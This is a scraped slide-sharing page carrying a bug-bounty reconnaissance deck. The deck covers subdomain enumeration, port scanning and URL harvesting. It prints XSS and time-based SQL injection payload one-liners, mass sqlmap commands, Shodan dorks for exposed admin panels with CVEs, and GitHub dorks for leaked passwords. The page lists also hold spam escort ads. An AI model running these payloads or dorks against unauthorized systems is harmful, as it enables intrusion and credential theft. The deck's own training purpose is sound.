Digital Personal Data Protection Act 2023 by S Ramakrishnan.pdfDigital Personal Data Protection Act 2023 by S Ramakrishnan.pdf
Digital Personal Data Protection Act 2023 by S Ramakrishnan.pdf
 
Beyond Boundaries-The Power of Zero Trust Networking By Mohammed Danish Amber...
Beyond Boundaries-The Power of Zero Trust Networking By Mohammed Danish Amber...Beyond Boundaries-The Power of Zero Trust Networking By Mohammed Danish Amber...
Beyond Boundaries-The Power of Zero Trust Networking By Mohammed Danish Amber...
 
Cyber_Forensics_in_the_New_Age_of_Cyber_Security.pdf
Cyber_Forensics_in_the_New_Age_of_Cyber_Security.pdfCyber_Forensics_in_the_New_Age_of_Cyber_Security.pdf
Cyber_Forensics_in_the_New_Age_of_Cyber_Security.pdf
 
GSM-CallFlowAndSecurity Features (2G-3G-4G).pptx
GSM-CallFlowAndSecurity Features (2G-3G-4G).pptxGSM-CallFlowAndSecurity Features (2G-3G-4G).pptx
GSM-CallFlowAndSecurity Features (2G-3G-4G).pptx
 
Reverse Engineering and It’s Basic by Prasenjit Kanti Paul.pptx
Reverse Engineering and It’s Basic by Prasenjit Kanti Paul.pptxReverse Engineering and It’s Basic by Prasenjit Kanti Paul.pptx
Reverse Engineering and It’s Basic by Prasenjit Kanti Paul.pptx
 
Get Started with Cyber Security and Its Landscape Null Community Presentation...
Get Started with Cyber Security and Its Landscape Null Community Presentation...Get Started with Cyber Security and Its Landscape Null Community Presentation...
Get Started with Cyber Security and Its Landscape Null Community Presentation...
 
Evolution of Hacking- Ronit Chakraborty .pptx
Evolution of Hacking- Ronit Chakraborty .pptxEvolution of Hacking- Ronit Chakraborty .pptx
Evolution of Hacking- Ronit Chakraborty .pptx
 
Demystifying Cyber Threat Intelligence -Debraj Dey Null_OWASP kolkata .pptx
Demystifying Cyber Threat Intelligence -Debraj Dey Null_OWASP kolkata .pptxDemystifying Cyber Threat Intelligence -Debraj Dey Null_OWASP kolkata .pptx
Demystifying Cyber Threat Intelligence -Debraj Dey Null_OWASP kolkata .pptx
 
C&C Framework- Ayan Saha.pptx
C&C Framework- Ayan Saha.pptxC&C Framework- Ayan Saha.pptx
C&C Framework- Ayan Saha.pptx
 

Recently uploaded

🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slidevu2urc
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Servicegiselly40
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024Results
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...gurkirankumar98700
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Igalia
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Allon Mureinik
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 

Recently uploaded (20)

🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 

Recon for Bug Bounty by Agnibha Dutta.pdf

  • 1. Recon Resurgence: Level up your Recon skills for Maximum impact in Bug-Bounty
  • 2. WHOAMI? Security Analyst at Mithra Consulting Pursuing MBBS Part-time Bug bounty hunter CyberSecurity Trainer & Mentor Agnibha Dutta Y0gi eJPT Certified Successfully Hacked and Secured: Sony Acronis NASA + 20 other companies https://twitter.com/AnonY0gi https://www.youtube.com/@y0gisec https://www.linkedin.com/in/y0gi/
  • 3. WHAT IS RECONNAISSANCE? The Reconnaissance is one of the most important aspect of penetration testing. Its also known as Recon. Recon will help you to increase attack surface area and may allow you to get more vulnerabilities but ultimate goal is to dig deep in the target Recon = Increase in Attack surface = More vulnerabilities Recon = Finding untouched endpoints = Less duplicates Recon = Sharpening your axe before attack
  • 4. SUBDOMAIN ENUMERATION Subdomain enumeration is the process of finding subdomains for one or more domain. Tools used: Visual Recon: VirusTotal, subdomainfinder.c99.nl https://crt.sh/?q=%25.target.com https://securitytrails.com/list/apex_domain/target.com https://www.shodan.io/search?query=Ssl.cert.subject.CN%3A%22t arget.com%22 Amass Dnsx Subfinder Chaos AssetFinder
  • 5. SUBDOMAIN ENUMERATION amass enum -passive -norecursive -noalts -df domians.txt -o subs-list.txt dnsx -silent -d $domain -w ~/wordlist.txt -o ~/dnsbrute.txt cat domain.txt | dnsgen - | massdns -r ~/resolvers.txt -o S -w alive.txt
  • 6. FILTERING THE SUBDOMAINS WITH HTTPX httpx -l domain.txt -timeout 13 -o domain-probe.txt PORT SCANNING naabu -list sub-list.txt -top-ports 1000 -exclude-ports 80,443,21,22,25 -o ports.txt naabu -list sub-list.txt -p - -exclude-ports 80,443,21,22,25 -o ports.txt cat domain-subs.txt | aquatone -ports xlarge -scan-timeout 300 -out aquatone.txt HEDnsExtractor -target 20.216.181.67 -only-domains -silent | httpx -title -tech-detect - status-code -silent
  • 7. SUBDOMAIN OF SUBDOMAIN ENUMERATION One of the rare things people search of. Tools used: Subbrute: https://github.com/TheRook/subbrute altdns: https://github.com/infosec-au/altdns Usage: ./altdns.py -i subdomains.txt -o data_output -w words.txt -r -s output.txt
  • 8. FINDING LOGIN PANEL FROM URLS Extract login panel from a list of urls for further testing . Tools used: https://github.com/Mr-Robert0/Logsensor
  • 9. BROADENING YOUR SCOPE More targets lead to more option which ultimately lead to more opportunities. Crunchbase bgp.he.net tools.whoisxmlapi.com https://whois.arin.net
  • 10. WHAT TO DO AFTER ENUMERATION? | Collecting URLs Waybackurls: https://github.com/tomnomnom/waybackurls Gau: https://github.com/lc/gau for i in $(cat domain-subs.txt);do gau $i | egrep -vE ".(woff | woff2 | ttf | toff | eot | webp | gif | tiff | bmp | wav | png | jpg | jpeg | svg | ico | css | mp4 | m4v)" | httpx -silent -fc 404 | tee -a domain-archive.txt;done https://web.archive.org/cdx/search/cdx?url=*.target.com&fl=original&collapse= urlkey
  • 11. After collecting URLs, curl out the responses of the URLs and grep for the following URLs: drive.google docs.google /spreadsheets/d/ /document/d/ TIPS AND TRICKS By Aditya_Shende cat domains.txt | katana -silent | while read url; do cu=$(curl -s $url | grep -E '(drive. google | docs. google | spreadsheet/d | document./d/)';echo -e "==> $url" "n"" $cu"; done
  • 12. TIPS AND TRICKS Alien Vault OTX (otx.alienvault.com) Collect Endpoints : https://github.com/xnl-h4ck3r/waymore Common Crawl (index.commoncrawl.org) URLScan (urlscan.io)
  • 13. Using paramspider, gxss to detect Cross-site Scripting (XSS) cat params | qsreplace yogi | dalfox pipe --mining-dom --deep-domxss --mining-dict --remote- payloads=portswigger,payloadbox --remote-wordlists=burp,assetnote -o xssoutput.txt cat alive.txt | waybackurls | gf xss | uro | httpx -silent | qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)" | tee xssBug3.txt TIPS AND TRICKS Using SQLidetector to search for sqli Tool Link: https://github.com/eslam3kl/SQLiDetector
  • 14. https://github.com/xforcered/SQLRecon TIPS AND TRICKS SQLi Time Based Tips cat urls.txt | grep "=" | qsreplace "1 AND (SELECT 5230 FROM (SELECT(SLEEP(10)))SUmc)" > blindsqli.txt cat blindsqli.txt | parallel -j50 -q curl -o /dev/null -s -w % {time_total}n Header Based SqLi: https://github.com/SAPT01/HBSQLI subfinder -dL domains.txt | dnsx | waybackurl | uro | grep "?" | head -20 | httpx -silent > urls;sqlmap -m urls --batch --random-agent --level 1 | tee sqlmap.txt
  • 15. Shodan: https://www.shodan.io/ SHODAN FOR RECON Shodan Dork: ssl:"target[.]com" 200 http.title:"dashboard" --unauthenticated dashboard org:"target.com" x-jenkins 200 --- unauthenticated jenkins server ssl:"target.com" 200 proftpd port:21 --- proftpd port:21 org:"target.com" http.html:zabbix --- CVE-2022-24255 Main & Admin Portals: Authentication Bypass org:"target.com" http.title:"phpmyadmin" ----php my admin ssl:"target.com" http.title:"BIG-IP ---F5 BIG-IP using CVE-2020-5902 Use Shodan in combination with Fofa & use exploit .
  • 16. Censys: https://www.censys.io/ CENSYS, ZOOMEYE Zoomeye: https://www.zoomeye.org/ Tip: http.favicon.hash:xxxxxxxxxx
  • 17. ffuf: https://github.com/ffuf/ffuf FUZZING FOR SENSITIVE FILES & DIRECTORIES FFUF-ing RECON Writeup on FFuf for i in `cat host.txt`; do ffuf -u $i/FUZZ -w wordlist.txt -mc 200,302,401 -se ;done Tip: Fuzz for "/wp-content/debug.log" || Sometimes they contain SQL error, which can be chained.
  • 19. y0gi.hacklido.com y0gi.hacklido.com /y0gi.zip - hacklido.zip – admin.zip – backup.zip y0gi.hacklido.com/y0gi/y0gi.zip - hacklido.zip – admin.zip – backup.zip y0gi. hacklido.com/hacklido/y0gi.zip - hacklido.zip – admin.zip – backup.zip y0gi. hacklido.com/admin/y0gi.zip - hacklido.zip – admin.zip – backup.zip FINDING SOURCE/BACKUP FILES Tool: https://github.com/musana/fuzzuli Credit: GodfatherOrwa
  • 20. Trivial Tricks: Find Sensitive Data in Cloud storage: site:http://s3.amazonaws.com "target[.]com" site:http://blob.core.windows.net "target[.]com" site:http://googleapis.com "target[.]com" site:http://drive.google.com "target[.]com" Github Leaks for AWS, Jira, Okta, etc: Org:"target" pwd/pass/passwd/password "target.atlassian" pwd/pass/passwd/password "target.okta" pwd/pass/passwd/password "Jira.target" pwd/pass/passwd/password Also search in Google groups, Gitlabs. GOOGLE & GITHUB DORKING
  • 21. Grep all urls from wayback or gau. Collect all js file ".js" Filter js file: " httpx -content-type | grep 'application/javascript'" Perform Nuclei scan "nuclei -t /root/nuclei-templates/exposures/" JAVASCRIPT[JS] FILES RECON Js Recon Tip: Collect all endpoints from Js files & Create a wordlist from those. Craft a POST request with any parameter. Use that request to fuzz for sensitive directory. Tools: JSFSCAN , Jsminer {Burp Extension} , Trufflehog
  • 22. JAVASCRIPT[JS] FILES RECON Using Bambdas for js analysis: One Liner : echo targetdomain[.]com | gau | grep ".js" | httpx -content-type | grep 'application/javascript'" | awk '{print $1}' | nuclei -t /root/nuclei- templates/exposures/ -silent > secrets.txt
  • 23. Verify Data Some data are intended, No bug here. Reported > Invalid Don't get angry, You may lose bonds with good program Yes, They do accept Third Party Your crafting and exploits are gold. Make it high as you can Be humble with Program Money going no where. Don't message constant to team